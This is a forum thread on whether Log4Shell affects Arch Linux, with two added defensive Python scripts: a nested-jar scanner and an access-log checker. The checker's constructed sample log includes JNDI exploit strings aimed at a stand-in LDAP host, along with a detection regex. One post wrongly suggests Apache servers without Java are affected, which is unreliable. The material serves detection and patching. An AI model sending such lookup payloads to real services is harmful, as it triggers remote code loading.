Does the Log4j vulnerability affect Arch Linux?

To what extent does the Log4j vulnerability affect the world of Arch Linux? In the case of Debian and Red Hat I've seen communication about this already, but I haven't come across much about Arch Linux yet.

It's not installed by default.
If it is contained in something you installed, you will have to check on your own.

Edit: There are several tools out in the wild to scan your machine for affected log4j versions, for example here:

This is not a vulnerability specific to a Linux distribution.
All servers running with Apache, whether or not they run Java, must secure this point, even if you have this Java component and no Java installed (for example JBoss, Spring, and all the other tools…).

Best way: suppress the older version class.

What all the others said, plus there’s a bug report collecting affected and non-affected packages at Arch: https://bugs.archlinux.org/task/72975

Not officially, it's an AUR package…

$ t log4j
1 extra/perl-log-log4perl 1.54-2
Log4j implementation for Perl
2 community/log4cplus 2.0.7-1 [installed]
A C++ logger very close to Java's log4j
3 community/log4cxx 0.12.0-1
A C++ port of Log4j
...
8 aur/log4j 2.16.0-1 [51+] [0.00%] [15 Dec 2021]
Logging library for Java
9 aur/log4j-detector 2021.12.16-1 [0+] [0.00%] [18 Dec 2021]
A tool for finding log4j versions vulnerable to CVE-2021-44228 and CVE-2021-45046.
...

v2.15 fixed the major vulnerability, but subsequent fixes are coming.

Java 8 and later will need v2.16, Java 7 users will need v2.12.2.

Log4j-core is often bundled in an application and not explicitly installed as its own package. It is not distribution specific. So yes, your install could be affected if you either explicitly installed it, or it was bundled in an application that you installed. You need to scan your system to be sure.

You are right, I forgot about potential Russian Doll style embedded jar files.

Yuk.

Another thing to consider is that scanning containers, flatpak, snapd is also more difficult and one could easily miss this bundled in one of those formats. I have little confidence in items offered in any of those formats being updated in a timely manner. Yes this CVE is really bad, that being said most of the stuff using it is providing some sort of deliverable, so for a personal desktop or laptop you are less likely to have it, but safe is better than sorry.

Just a question: Does this vulnerability affect only java programs? Am I safe if I do not have java (e.g. openJDK) installed on my system?

If it is bundled in an application it may also have Java bundled with the app. So yes, your system could be vulnerable even if you do not have Java explicitly installed by the package manager.

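The scan the posts above call for, as an added example that is not code from Arch, from the AUR log4j-detector package, or from any poster here: it walks a directory tree, opens every jar/war/ear, reads log4j-core's version from its Maven pom.properties, checks whether JndiLookup.class is still in the jar, and recurses into archives embedded in other archives (the "Russian doll" case). The fix levels it compares against (2.16.0 for Java 8+, 2.12.2 for Java 7) are the ones stated in this thread; the sample tree it builds in a temporary directory is constructed test data, not real log4j jars.

```python
"""Walk a directory tree and report every log4j-core inside jar/war/ear files,
including archives nested inside other archives ("Russian doll" jars).  Added
example for this thread, not code from Arch, the AUR log4j-detector package or
any poster; fix levels (2.16.0 for Java 8+, 2.12.2 for Java 7) are the thread's."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
POM_RE = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
VERSION_RE = re.compile(r"^version=(\S+)", re.M)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

@dataclass
class Finding:
    location: str          # path relative to the scan root; nested entries joined by "!"
    version: "str | None"  # from log4j-core's pom.properties, or None if absent
    has_jndi_lookup: bool  # JndiLookup.class still present in that jar

def parse_version(text):
    """'2.12.2-rc1' -> (2, 12, 2); None when the text is not a version."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None

def is_fixed(version):
    """True when the version reaches the fix level the thread names (2.x only)."""
    v = parse_version(version)
    if v is None or v[0] != 2:  # unparsable, or log4j 1.x (a different codebase)
        return False
    return v >= (2, 12, 2) if v[1] == 12 else v >= (2, 16, 0)  # 2.12.x is the Java 7 line

def classify(f):
    """fixed / mitigated (JndiLookup.class removed) / vulnerable / unknown-version."""
    if f.version is not None and is_fixed(f.version):
        return "fixed"
    if not f.has_jndi_lookup:
        return "mitigated"
    return "vulnerable" if f.version else "unknown-version"

def scan_archive(data, location, findings, depth=0, max_depth=5):
    """Inspect one archive held in memory and recurse into embedded archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = zf.namelist()
    pom = next((n for n in names if POM_RE.search(n)), None)
    m = VERSION_RE.search(zf.read(pom).decode("utf-8", "replace")) if pom else None
    version = m.group(1) if m else None
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        findings.append(Finding(location, version, has_jndi))
    if depth < max_depth:  # bound the recursion so a crafted archive cannot loop us
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), f"{location}!{name}", findings, depth + 1, max_depth)

def scan_tree(root):
    """Return Findings for every archive under root; unreadable files are skipped."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), os.path.relpath(path, root), findings)
            except OSError:
                continue
    return findings

def make_log4j_core(version, keep_jndi=True):
    # Constructed stand-in for a log4j-core jar: version marker plus the lookup class.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                    f"version={version}\nartifactId=log4j-core\n")
        if keep_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()

def build_sample_tree(root):
    # Constructed sample: one loose old jar, and an app.jar embedding two more.
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(make_log4j_core("2.14.1"))
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core-2.16.0.jar", make_log4j_core("2.16.0"))
        zf.writestr("BOOT-INF/lib/log4j-core-2.12.1.jar", make_log4j_core("2.12.1", keep_jndi=False))
    with open(os.path.join(root, "app.jar"), "wb") as fh:
        fh.write(outer.getvalue())

def demo():
    # Build the sample tree in a temporary directory and classify each finding.
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {f.location: classify(f) for f in scan_tree(tmp)}
```

Point scan_tree at / (or at /opt, /usr/share/java, your home directory and wherever third-party applications unpack themselves) to check a real system; the nested locations are printed with "!" separating the outer file from the embedded entry. A "mitigated" verdict means the jar is old but JndiLookup.class has been removed from it, which is the workaround vendors shipped before updating; "unknown-version" means the lookup class is present but the jar carries no pom.properties, so it deserves a manual look. Containers, Flatpaks and Snaps keep their own filesystems, as noted above, so run the scan inside them (or over their unpacked images) separately.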

Please note that even if you do use an application that bundles a vulnerable log4j library, an attacker must be in a position to control what is being written to the log (e.g. you host a publicly accessible webserver where some Java application is used in the background which logs the client's "User-Agent" string…) to be able to exploit the vulnerability…


I would not make that assumption; this CVE is evolving: https://www.blumira.com/analysis-log4shell-local-trigger/

Nasty. Still needs to be an application that is listening on some port and logging incoming requests.
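What "control what is being written to the log" looks like from the defending side, as an added example that is not code from any poster: a small checker for Apache combined-format access logs that flags the request fields an outside client controls (request line, referer, User-Agent) when they carry a log4j lookup string. It flags any "${name:" form rather than only the "${jndi:" indicator this CVE is known by, because no legitimate client ever sends a lookup and the wider match needs no list of variants. The log format assumed and the sample lines are constructed; the addresses are documentation ranges and a reserved ".invalid" hostname.

```python
"""Flag log4j lookup strings in client-controlled fields of an access log.
Added example for this thread, not code from any poster; the combined log
format is assumed and the sample lines below are constructed."""
import re

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Any "${name:" is flagged, not only "${jndi:": a real browser never sends a
# log4j lookup, so the generic form is a safe, variant-independent indicator.
LOOKUP_RE = re.compile(r"\$\{\s*[a-z]+\s*:", re.I)
CLIENT_FIELDS = ("request", "referer", "agent")  # text the remote client chooses


def parse_line(line):
    """Return the field dict for one combined-format line, or None if malformed."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_lookups(lines):
    """Return (ip, field, value) for each client-controlled field holding a lookup."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; count these separately if the log should be clean
        for field in CLIENT_FIELDS:
            if LOOKUP_RE.search(rec[field]):
                hits.append((rec["ip"], field, rec[field]))
    return hits


# Constructed sample: an ordinary request, two probes, and one garbled line.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [16/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.invalid/x}"',
    '203.0.113.9 - - [16/Dec/2021:10:01:06 +0000] "GET /?q=${jndi:ldap://scanner.invalid/x} HTTP/1.1" 400 0 "-" "curl/7.80.0"',
    "garbage line that does not parse",
]


def demo():
    """Run the checker over the constructed sample."""
    return find_lookups(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, field, value in demo():
        print(f"{ip} {field}: {value}")
```

A hit in the web server's log only shows that someone tried; whether it mattered depends on whether a Java application behind that server logged the same string with a vulnerable log4j-core, which is what the jar scan earlier in the thread answers. Feed the function your real log with `find_lookups(open("/var/log/httpd/access_log"))` and adjust LOG_RE if your vhost uses a different LogFormat.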

I recently emailed my great-niece, who is at uni studying cyber security amongst other things, about "Apache reveals another Log4J bug", so as to keep her up to date……

…… Might have guessed that she was up to speed… Endeavour too…! :roll_eyes:

She replied: Yeah, I heard loads about this vulnerability as it's been all over the infosec news for the past couple of weeks. It has the highest CVSS score of 10 and it affects so many systems - it's referred to as a cluster bomb of zero-days as it's in so many applications and you might not be aware that you're using it through some type of dependency.

It's kinda surprising how long it took to find this vulnerability because when you look into it, it is quite obvious and really easy to exploit. It makes you think how many other really easy and exploitable vulnerabilities like this are out in the wild.

This vulnerability will be with us for a while and all we can do at this moment is hope that the applications that we are using have patched against it.

Ash

p.s. I also find it slightly amusing that this vulnerability was found by gamers trying to hack other people’s Minecraft servers.

I do not have any AUR packages at all AFAIK so trust laptop okay :thinking: